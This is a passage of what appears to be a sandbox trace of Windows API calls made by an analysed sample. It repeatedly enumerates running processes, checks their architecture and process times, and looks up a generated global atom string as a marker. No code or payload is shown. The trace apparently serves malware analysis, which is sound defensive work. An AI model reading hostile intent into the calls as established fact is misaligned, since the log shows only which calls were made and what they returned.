	[0079.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0079.499] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.499] CloseHandle (hObject=0x224) returned 1
	[0079.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0079.499] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.499] CloseHandle (hObject=0x224) returned 1
	[0079.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0079.499] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.499] CloseHandle (hObject=0x224) returned 1
	[0079.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0079.500] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.500] CloseHandle (hObject=0x224) returned 1
	[0079.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0079.500] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.500] CloseHandle (hObject=0x224) returned 1
	[0079.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0079.500] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.500] CloseHandle (hObject=0x224) returned 1
	[0079.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0079.500] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.500] CloseHandle (hObject=0x224) returned 1
	[0079.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0079.500] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.500] CloseHandle (hObject=0x224) returned 1
	[0079.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0079.500] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.500] CloseHandle (hObject=0x224) returned 1
	[0079.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0079.500] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.500] CloseHandle (hObject=0x224) returned 1
	[0079.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0079.501] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.501] CloseHandle (hObject=0x224) returned 1
	[0079.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0079.501] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.501] CloseHandle (hObject=0x224) returned 1
	[0079.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0079.501] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.501] CloseHandle (hObject=0x224) returned 1
	[0079.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0079.501] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.501] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0079.501] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0079.501] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0079.502] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.502] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0079.502] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.502] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0079.502] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0079.502] CloseHandle (hObject=0x224) returned 1
	[0079.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0079.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0079.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0079.502] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.502] CloseHandle (hObject=0x224) returned 1
	[0079.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0079.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0079.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0079.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0079.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0079.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0079.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0079.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0079.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0079.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0079.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0079.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0079.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0079.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0079.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0079.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0079.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0079.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0079.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0079.576] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.576] CloseHandle (hObject=0x224) returned 1
	[0079.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0079.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0079.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0079.576] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.576] CloseHandle (hObject=0x224) returned 1
	[0079.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0079.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0079.577] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.577] CloseHandle (hObject=0x224) returned 1
	[0079.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0079.577] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.577] CloseHandle (hObject=0x224) returned 1
	[0079.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0079.577] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.577] CloseHandle (hObject=0x224) returned 1
	[0079.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0079.577] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.577] CloseHandle (hObject=0x224) returned 1
	[0079.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0079.577] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.577] CloseHandle (hObject=0x224) returned 1
	[0079.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0079.577] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.577] CloseHandle (hObject=0x224) returned 1
	[0079.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0079.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0079.578] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.578] CloseHandle (hObject=0x224) returned 1
	[0079.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0079.578] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.578] CloseHandle (hObject=0x224) returned 1
	[0079.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0079.578] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.578] CloseHandle (hObject=0x224) returned 1
	[0079.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0079.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0079.578] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.578] CloseHandle (hObject=0x224) returned 1
	[0079.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0079.578] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.578] CloseHandle (hObject=0x224) returned 1
	[0079.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0079.578] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.579] CloseHandle (hObject=0x224) returned 1
	[0079.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0079.579] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.579] CloseHandle (hObject=0x224) returned 1
	[0079.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0079.579] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.579] CloseHandle (hObject=0x224) returned 1
	[0079.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0079.579] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.579] CloseHandle (hObject=0x224) returned 1
	[0079.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0079.579] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.579] CloseHandle (hObject=0x224) returned 1
	[0079.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0079.579] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.580] CloseHandle (hObject=0x224) returned 1
	[0079.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0079.580] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.580] CloseHandle (hObject=0x224) returned 1
	[0079.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0079.580] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.580] CloseHandle (hObject=0x224) returned 1
	[0079.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0079.580] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.580] CloseHandle (hObject=0x224) returned 1
	[0079.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0079.580] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.580] CloseHandle (hObject=0x224) returned 1
	[0079.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0079.580] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.580] CloseHandle (hObject=0x224) returned 1
	[0079.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0079.580] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.580] CloseHandle (hObject=0x224) returned 1
	[0079.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0079.581] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.581] CloseHandle (hObject=0x224) returned 1
	[0079.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0079.581] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.581] CloseHandle (hObject=0x224) returned 1
	[0079.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0079.581] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.581] CloseHandle (hObject=0x224) returned 1
	[0079.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0079.581] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.581] CloseHandle (hObject=0x224) returned 1
	[0079.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0079.581] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.581] CloseHandle (hObject=0x224) returned 1
	[0079.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0079.581] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.581] CloseHandle (hObject=0x224) returned 1
	[0079.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0079.582] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.582] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0079.582] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0079.582] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0079.582] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.582] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0079.582] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.582] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0079.583] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0079.583] CloseHandle (hObject=0x224) returned 1
	[0079.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0079.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0079.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0079.583] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.583] CloseHandle (hObject=0x224) returned 1
	[0079.685] VirtualAlloc (lpAddress=0x0, dwSize=0x16ab8, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0079.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16ab8, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0079.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0079.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0079.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0079.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0079.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0079.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0079.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0079.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0079.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0079.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0079.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0079.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0079.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0079.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0079.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0079.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0079.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0079.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0079.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0079.692] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.692] CloseHandle (hObject=0x224) returned 1
	[0079.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0079.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0079.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0079.692] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.692] CloseHandle (hObject=0x224) returned 1
	[0079.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0079.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0079.693] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.693] CloseHandle (hObject=0x224) returned 1
	[0079.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0079.693] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.693] CloseHandle (hObject=0x224) returned 1
	[0079.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0079.693] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.693] CloseHandle (hObject=0x224) returned 1
	[0079.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0079.693] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.693] CloseHandle (hObject=0x224) returned 1
	[0079.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0079.693] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.693] CloseHandle (hObject=0x224) returned 1
	[0079.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0079.693] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.694] CloseHandle (hObject=0x224) returned 1
	[0079.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0079.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0079.694] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.694] CloseHandle (hObject=0x224) returned 1
	[0079.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0079.694] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.694] CloseHandle (hObject=0x224) returned 1
	[0079.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0079.694] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.694] CloseHandle (hObject=0x224) returned 1
	[0079.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0079.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0079.694] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.694] CloseHandle (hObject=0x224) returned 1
	[0079.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0079.694] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.694] CloseHandle (hObject=0x224) returned 1
	[0079.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0079.695] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.695] CloseHandle (hObject=0x224) returned 1
	[0079.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0079.695] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.695] CloseHandle (hObject=0x224) returned 1
	[0079.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0079.695] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.695] CloseHandle (hObject=0x224) returned 1
	[0079.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0079.695] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.695] CloseHandle (hObject=0x224) returned 1
	[0079.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0079.695] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.695] CloseHandle (hObject=0x224) returned 1
	[0079.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0079.695] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.695] CloseHandle (hObject=0x224) returned 1
	[0079.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0079.695] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.695] CloseHandle (hObject=0x224) returned 1
	[0079.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0079.696] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.696] CloseHandle (hObject=0x224) returned 1
	[0079.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0079.696] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.696] CloseHandle (hObject=0x224) returned 1
	[0079.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0079.696] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.696] CloseHandle (hObject=0x224) returned 1
	[0079.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0079.696] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.696] CloseHandle (hObject=0x224) returned 1
	[0079.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0079.696] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.696] CloseHandle (hObject=0x224) returned 1
	[0079.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0079.696] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.696] CloseHandle (hObject=0x224) returned 1
	[0079.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0079.696] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.697] CloseHandle (hObject=0x224) returned 1
